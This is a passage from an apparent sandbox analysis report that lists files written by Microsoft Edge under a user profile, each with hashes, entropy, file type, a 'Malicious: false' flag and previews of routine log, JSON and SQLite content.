Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.075416410801907
Encrypted:	false
SSDEEP:	6:HUYoAVAq2P923oH+TcwtrQMxIFUt8YUY0NZmw+YUYnMkwO923oH+TcwtrQMFLJ:bdmv4YebCFUt8ui/+uM5LYebtJ
MD5:	FA5E170C5C66841404012E495B38FAB6
SHA1:	09E146696956EFE7319A9BE91AA188EC98BAE32E
SHA-256:	A1DB535A3A167B6584E8EE0852B5B476A32B736A0CEC830A3A297CAFB45A61D3
SHA-512:	0F7B1E494B7373363DF2A0C92473861E7652D64190A85A5ADF1BF8E6DC33A8735697863CC84C037FA3E486162E3BFF46E30E4BEF4A8277FC59D859172EF7150F
Malicious:	false
Preview:	2024/11/11-18:06:18.601 1e00 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/11-18:06:18.679 1e00 Recovering log #3.2024/11/11-18:06:18.743 1e00 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.075416410801907
Encrypted:	false
SSDEEP:	6:HUYoAVAq2P923oH+TcwtrQMxIFUt8YUY0NZmw+YUYnMkwO923oH+TcwtrQMFLJ:bdmv4YebCFUt8ui/+uM5LYebtJ
MD5:	FA5E170C5C66841404012E495B38FAB6
SHA1:	09E146696956EFE7319A9BE91AA188EC98BAE32E
SHA-256:	A1DB535A3A167B6584E8EE0852B5B476A32B736A0CEC830A3A297CAFB45A61D3
SHA-512:	0F7B1E494B7373363DF2A0C92473861E7652D64190A85A5ADF1BF8E6DC33A8735697863CC84C037FA3E486162E3BFF46E30E4BEF4A8277FC59D859172EF7150F
Malicious:	false
Preview:	2024/11/11-18:06:18.601 1e00 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/11-18:06:18.679 1e00 Recovering log #3.2024/11/11-18:06:18.743 1e00 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13375839979804117

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1443
Entropy (8bit):	3.797270641917322
Encrypted:	false
SSDEEP:	24:3BfNFvs1yehlSpsAF4unxoyatLp3X2amEtG1Chq/kwF5UqvlGtQKkOAM4T8T:3rF8tlSzFyLp2FEkChIwEcOHOpsk
MD5:	B01A6FB4E78C0823A614018AD48E8B94
SHA1:	133381A9BD553D5666B5EEB742BA92D9C39BE104
SHA-256:	152F7763CAB226ACA9FC9ABDBA8B6EE91F42D5709C538D8C980CC538881944E1
SHA-512:	7093366B87D08F73C1C59843A4BE9A879322B8B5105E46142A49F5F83E5A4B296B46375A6AE78E7E2E66514327AF0B05030353F83442876D84F4C7937750DCE5
Malicious:	false
Preview:	SNSS.........n.............n......"..n.............n.........n.........n.........n....!....n.................................n..n1..,.....n$...9a8f4a5b_c3ea_4786_8310_fa61365b67c5.....n.........n....v.!..........n.....n.........................n....................5..0.....n&...{98952893-68FF-4A5D-A164-705C709ED3DB}.......n.........n.............n........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......d..&.&..e..&.&.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8....................................................................... ..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.44194574462308833
Encrypted:	false
SSDEEP:	12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
MD5:	B35F740AA7FFEA282E525838EABFE0A6
SHA1:	A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:	5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:	05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.036927640067585
Encrypted:	false
SSDEEP:	6:HUYcuLIq2P923oH+Tcwt7Uh2ghZIFUt8YUYcuLZZmw+YUYcuLzkwO923oH+Tcwts:bcrv4YebIhHh2FUt8ucO/+uci5LYebIT
MD5:	3782AAE450925806C3532383AB277A97
SHA1:	8A7C4CB3A955E501B22680D75C493AECCFE07787
SHA-256:	7EEA4C93CB35A30C033F203302CA4D39847FDB1B9378D62C5332F13EE0D30397
SHA-512:	2A6F44E5BB677E06968E4590FA86746A765F278F13F7AF8D310299AA4F3537E93ED3B82ED884CA7E3102105CCCC6A1CCFCA8BD1D2D4AA02C295C5E0D8BCF524E
Malicious:	false
Preview:	2024/11/11-18:06:17.100 1c10 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/11-18:06:17.100 1c10 Recovering log #3.2024/11/11-18:06:17.100 1c10 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.036927640067585
Encrypted:	false
SSDEEP:	6:HUYcuLIq2P923oH+Tcwt7Uh2ghZIFUt8YUYcuLZZmw+YUYcuLzkwO923oH+Tcwts:bcrv4YebIhHh2FUt8ucO/+uci5LYebIT
MD5:	3782AAE450925806C3532383AB277A97
SHA1:	8A7C4CB3A955E501B22680D75C493AECCFE07787
SHA-256:	7EEA4C93CB35A30C033F203302CA4D39847FDB1B9378D62C5332F13EE0D30397
SHA-512:	2A6F44E5BB677E06968E4590FA86746A765F278F13F7AF8D310299AA4F3537E93ED3B82ED884CA7E3102105CCCC6A1CCFCA8BD1D2D4AA02C295C5E0D8BCF524E
Malicious:	false
Preview:	2024/11/11-18:06:17.100 1c10 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/11-18:06:17.100 1c10 Recovering log #3.2024/11/11-18:06:17.100 1c10 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.239584840700573
Encrypted:	false
SSDEEP:	12:boGZv4YebvqBQFUt8u7/+upnz5LYebvqBvJ:M64YebvZg88LYebvk
MD5:	976403EFA4CEB6DCB27B669D02FC6B03
SHA1:	160A16EDD207DFF20930193E61B3BF8C41A4C492
SHA-256:	B8659F9BA2A5EA0B94BF3F0A0F37040F4261F609642457EF6B67B1C623955ABC
SHA-512:	08C5849653D5B1786998638A5E70D770372AABEE9A8A887EEC4A7A66749F0704AAC3B32C930305DBC2ED86C4582F286A25FB319B42DE94BE0C57130BE8BA827D
Malicious:	false
Preview:	2024/11/11-18:06:18.708 1c58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/11-18:06:18.785 1c58 Recovering log #3.2024/11/11-18:06:18.969 1c58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.239584840700573
Encrypted:	false
SSDEEP:	12:boGZv4YebvqBQFUt8u7/+upnz5LYebvqBvJ:M64YebvZg88LYebvk
MD5:	976403EFA4CEB6DCB27B669D02FC6B03
SHA1:	160A16EDD207DFF20930193E61B3BF8C41A4C492
SHA-256:	B8659F9BA2A5EA0B94BF3F0A0F37040F4261F609642457EF6B67B1C623955ABC
SHA-512:	08C5849653D5B1786998638A5E70D770372AABEE9A8A887EEC4A7A66749F0704AAC3B32C930305DBC2ED86C4582F286A25FB319B42DE94BE0C57130BE8BA827D
Malicious:	false
Preview:	2024/11/11-18:06:18.708 1c58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/11-18:06:18.785 1c58 Recovering log #3.2024/11/11-18:06:18.969 1c58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\05430bfb-5169-4b12-bebb-9047339e5d8c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\20e1525f-b88c-4af0-804c-2350e3a38fcc.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\494ea143-4006-4b2d-b413-fd0e80ae8e7b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\9e61c351-2abf-43d4-a600-34e043b70f1e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF37fb0.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF38dd9.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF43b02.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries~RF46454.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.3886039372934488
Encrypted:	false
SSDEEP:	24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:	DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:	949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:	3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:	7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\bdecf8d5-4929-4321-81dd-9b395a100a92.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\d5d7d838-1b67-443a-b8ab-42d9c59fe504.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	3.4921535629071894
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
MD5:	69449520FD9C139C534E2970342C6BD8
SHA1:	230FE369A09DEF748F8CC23AD70FD19ED8D1B885
SHA-256:	3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
SHA-512:	EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	422
Entropy (8bit):	5.240593910446882
Encrypted:	false
SSDEEP:	12:bFoN+v4YebvqBZFUt8uFTa/+uFjV5LYebvqBaJ:RJ4Yebvyg8eTy7LYebvL
MD5:	6A587C5805CCC044D0BC41A2749FFB9D
SHA1:	0A09560D9622A0A03E48D3A4790CBF1D3EA7F115
SHA-256:	0E82E92842D799E313657E4A7E8190C9AC6265C5213E0FE54C1704FB757B620A
SHA-512:	8067FDD9B0C584E679D28749F59AC30E7B8B53FAD10D7726031A178A240974C8B8164C6B2E5BD82E6139B545DA5D33D7EEBB248B5FFE9A15EFCFD2B373983D16
Malicious:	false
Preview:	2024/11/11-18:06:36.984 1d9c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/11-18:06:36.986 1d9c Recovering log #3.2024/11/11-18:06:36.989 1d9c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	422
Entropy (8bit):	5.240593910446882
Encrypted:	false
SSDEEP:	12:bFoN+v4YebvqBZFUt8uFTa/+uFjV5LYebvqBaJ:RJ4Yebvyg8eTy7LYebvL
MD5:	6A587C5805CCC044D0BC41A2749FFB9D
SHA1:	0A09560D9622A0A03E48D3A4790CBF1D3EA7F115
SHA-256:	0E82E92842D799E313657E4A7E8190C9AC6265C5213E0FE54C1704FB757B620A
SHA-512:	8067FDD9B0C584E679D28749F59AC30E7B8B53FAD10D7726031A178A240974C8B8164C6B2E5BD82E6139B545DA5D33D7EEBB248B5FFE9A15EFCFD2B373983D16
Malicious:	false
Preview:	2024/11/11-18:06:36.984 1d9c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/11-18:06:36.986 1d9c Recovering log #3.2024/11/11-18:06:36.989 1d9c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.176561739013067
Encrypted:	false
SSDEEP:	6:HUYmud+q2P923oH+TcwtpIFUt8YUYRUpZmw+YUYgVkwO923oH+Tcwta/WLJ:bHYv4YebmFUt8uRo/+u45LYebaUJ
MD5:	9B01E636641ABCC6512560A2CCAE45F0
SHA1:	8F0CD05F5762D8DD0406F1B674E4825903CF1AF2
SHA-256:	C405BDF9E0A2B20940978E99D9F63465092A5AB9326A9FACE984786318942FF1
SHA-512:	6681F311B8ECC270ED26B85239FF9B38A41DAF85A2AA1FB59E26F6298757857BB24083EBFE5B1BAA37948D28881E7C5DA365BB3EC36273C51EB580C6C5718DD2
Malicious:	false
Preview:	2024/11/11-18:06:17.124 1dd8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/11-18:06:17.129 1dd8 Recovering log #3.2024/11/11-18:06:17.130 1dd8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.176561739013067
Encrypted:	false
